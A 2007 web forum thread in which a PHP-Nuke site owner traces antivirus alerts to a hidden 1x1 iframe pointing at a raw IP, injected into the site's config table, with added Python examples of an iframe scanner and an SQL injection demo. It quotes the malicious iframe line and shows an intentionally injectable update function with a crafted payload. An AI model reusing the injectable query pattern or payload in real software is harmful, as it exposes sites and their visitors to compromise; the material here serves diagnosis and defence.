Ravens PHP Scripts: Forums
fondy
Regular


Joined: Sep 12, 2003
Posts: 55

Posted: Mon Sep 24, 2007 4:49 am

Hi

I have a phpnuke site, version 6.5. When I go into the site using IE, the site comes up, but Symantec says the 'Bloodhound.Exploit.109' trojan is on your computer.

Using Mozilla Firefox I got no such messages.

A visitor using the McAfee virus scanner and IE got the message: 'JS/Downloader-AUD', script execution blocked.

Are some php scripts hacked?

regards fondy
 
montego
Site Admin


Joined: Aug 29, 2004
Posts: 9456
Location: Arizona

Posted: Mon Sep 24, 2007 6:19 am

Well, here is the text from the Symantec site:

Quote:

Bloodhound.Exploit.109 is a heuristic detection for Apple QuickTime RTSP URI Remote Buffer Overflow Vulnerability. An attacker who exploits this vulnerability could perform a denial-of-service attack against a vulnerable version of QuickTime, or potentially execute arbitrary code with the privileges of the logged-on user. The exploit is triggered by opening a specially-crafted QTL file.

Applies to: Apple QuickTime Player 7.1.3

Files that are detected as Bloodhound.Exploit.109 may be malicious. We suggest that you submit to Symantec Security Response any files that are detected as Bloodhound.Exploit.109.


I would definitely look your site over and see what file is causing this and then you have to figure out how that file got on your site.

jakec
Site Admin


Joined: Feb 06, 2006
Posts: 3048
Location: United Kingdom

Posted: Mon Sep 24, 2007 6:21 am

Are you using any sort of encryption on your site? Maybe a theme you use?

I have seen this cause false positives when using McAfee on some sites.
 
fondy
Posted: Mon Sep 24, 2007 6:39 am

Hi

thanks for your answers.

Montego: Yes, I will check the files and scripts. The problem with the virus started a week ago. When I check the time stamps on the files, they are a lot older.

Jakec: No, I do not use encryption of any sort.

The link to my site: [link hidden by the board]

Will start looking at the files.

regards
 
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

Posted: Mon Sep 24, 2007 5:22 pm

You have a suspicious iframe in your footer

Code:
iframe src=http://81.29.241.229/usr2/andrew/index.php?id=290 width=1 height=1


My guess is that is setting off the virus checker

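The symptom evaders99 spotted, a 1x1 iframe hidden in the footer and pointing at a raw IP address, is something a site owner can scan for rather than finding by eye. The following is an added example (not code from this thread, from PHP-Nuke or from RavenNuke): it parses HTML with Python's standard library, reports iframes that are invisible to the visitor, that load from a bare IP address, or that load from a host outside an optional allowlist, and applies the same check to stored configuration strings such as the copyright/footer text that was modified here. The sample footer is constructed for the example and reuses the src from the thread next to a made-up legitimate embed.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample footer: a hidden 1x1 iframe with the src reported in the
# thread, sitting next to a made-up, visible embed.
SAMPLE_FOOTER = (
    '<div class="copyright">Powered by Nuke '
    '<iframe src=http://81.29.241.229/usr2/andrew/index.php?id=290 width=1 height=1></iframe>'
    '</div>\n'
    '<iframe src="https://www.youtube.com/embed/example" width="560" height="315"></iframe>\n'
)


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _tiny(value):
    """True when a width/height attribute is 1 pixel or less."""
    v = value.strip().lower()
    if v.endswith("px"):
        v = v[:-2]
    try:
        return float(v) <= 1
    except ValueError:
        return False


def _raw_ip_host(src):
    """True when the iframe source host is a bare IP address rather than a name."""
    host = urlparse(src).hostname or ""
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return False
    return True


def suspicious_iframes(html, allowed_hosts=()):
    """Return [(src, [reasons...])] for iframes a defender should review.

    allowed_hosts: optional allowlist of hostnames the site legitimately embeds;
    when given, any other host is reported as well.
    """
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname or ""
        reasons = []
        if _tiny(attrs.get("width", "")) or _tiny(attrs.get("height", "")):
            reasons.append("1px or smaller (invisible to the visitor)")
        style = attrs.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by CSS")
        if _raw_ip_host(src):
            reasons.append("src host is a raw IP address")
        if allowed_hosts and host not in allowed_hosts:
            reasons.append("host %r not in allowlist" % host)
        if reasons:
            findings.append((src, reasons))
    return findings


def scan_config_fields(fields, allowed_hosts=()):
    """Run the same check over stored CMS config strings (field name -> value),
    e.g. a copyright/footer field read out of the config table."""
    report = {}
    for name, value in fields.items():
        hits = suspicious_iframes(value, allowed_hosts)
        if hits:
            report[name] = hits
    return report


if __name__ == "__main__":
    for src, why in suspicious_iframes(SAMPLE_FOOTER):
        print(src, "->", "; ".join(why))
```

Run it against a saved copy of the rendered page and, separately, against the config rows dumped from the database: a hit in the stored fields (rather than only in the rendered output) is the signal that the content itself was modified, as it was in this thread.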
fondy
Posted: Tue Sep 25, 2007 12:54 am

Evaders99, thanks!!

Yes, the config table and the copyright field were updated with an iframe last week or so.

I don't know how anyone can update the config table. I have a secure database with ids and passwords.

In any case, all is ok now, thanks !!

Regards
 
evaders99
Posted: Tue Sep 25, 2007 12:59 am

Simple: SQL injection. Somewhere your script has a vulnerability; given that it's such an old version (6.5), I wouldn't be surprised. If you don't want your site hacked, you'll need to upgrade.
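To make the mechanism evaders99 names concrete: a config field gets rewritten when user-supplied text is pasted into the SQL statement instead of being passed as a bound parameter. The block below is an added example, not code from the thread or from PHP-Nuke, and uses an in-memory SQLite table named nuke_config with made-up sitename and copyright columns as a stand-in for the real schema. It shows the interpolating update beside the parameterised one and what each stores when given the same crafted string.

```python
import sqlite3

# Constructed, simplified stand-in for a CMS config table; the real PHP-Nuke
# schema is not reproduced here.
def fresh_config_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE nuke_config (sitename TEXT, copyright TEXT)")
    con.execute("INSERT INTO nuke_config VALUES ('My Site', '(c) 2007 My Site')")
    return con


def update_sitename_unsafe(con, value):
    """Builds the SQL by string interpolation: a quote inside `value` ends the
    string literal and whatever follows is executed as SQL."""
    con.execute("UPDATE nuke_config SET sitename='%s'" % value)


def update_sitename_safe(con, value):
    """Parameter binding: the driver passes `value` as data, so it cannot
    alter the statement whatever it contains."""
    con.execute("UPDATE nuke_config SET sitename=?", (value,))


def read_config(con):
    """Return the single (sitename, copyright) row."""
    return con.execute("SELECT sitename, copyright FROM nuke_config").fetchone()


# Constructed input that closes the sitename literal and goes on to assign
# a different column; the host is a placeholder, not one from the thread.
CRAFTED = "Site', copyright='<iframe src=http://placeholder.invalid/ width=1 height=1>"


def compare():
    """Return (row after the unsafe update, row after the safe update)
    when both receive CRAFTED as the new site name."""
    unsafe = fresh_config_db()
    update_sitename_unsafe(unsafe, CRAFTED)
    safe = fresh_config_db()
    update_sitename_safe(safe, CRAFTED)
    return read_config(unsafe), read_config(safe)


if __name__ == "__main__":
    unsafe_row, safe_row = compare()
    print("interpolated :", unsafe_row)
    print("parameterised:", safe_row)
```

With interpolation the copyright column ends up holding the iframe text while sitename becomes just "Site"; with the bound parameter the whole crafted string is stored verbatim as the site name and the copyright column is untouched. Upgrading, as the thread recommends, is the practical fix for an old code base; the check for any remaining custom code is that every query takes user input through parameters like the second function.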
 
fondy
Posted: Tue Sep 25, 2007 1:40 am

Agreed on upgrading; I have several domains using RavenNuke 2.10.01.

Will start to upgrade to this version and use Sentinel.

Thanks :)
 
fondy
Posted: Thu Sep 27, 2007 6:28 am

Upgrading from Nuke 6.5 to RavenNuke 2.10.01 with Sentinel 2.5.08 finished.

No more Bloodhound and the like.

:)

Regards
 
montego
Posted: Thu Sep 27, 2007 6:31 am

I would not stop there on NukeSentinel. I would get the latest upgrade pack and apply it as well. It is a CRITICAL update.
 
Susann
Moderator


Joined: Dec 19, 2004
Posts: 3191
Location: Germany; Moderator, German NukeSentinel Support

Posted: Thu Sep 27, 2007 6:33 am

Well done! You should also update NukeSentinel and IP2Country. :)
 
fondy
Posted: Thu Sep 27, 2007 7:04 am

Hi

thanks!

Have now upgraded to the latest IP2Country distribution.

I assume there will be a lot of work to upgrade to the latest Sentinel, but I have to try.

:)

Regards fondy
 
Susann
Posted: Thu Sep 27, 2007 7:28 am

It's a simple procedure: download NukeSentinel 2.5.12 from nukescripts, run nsnst.php and select 2.5.08 - 2.5.09 etc. until you reach NukeSentinel version 2.5.12.
 
fondy
Posted: Thu Sep 27, 2007 7:31 am

Yes Susann, it was very simple. Now I have the latest IP2Country and Sentinel 2.5.12. Great!

Thanks a lot

Regards fondy
 
Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours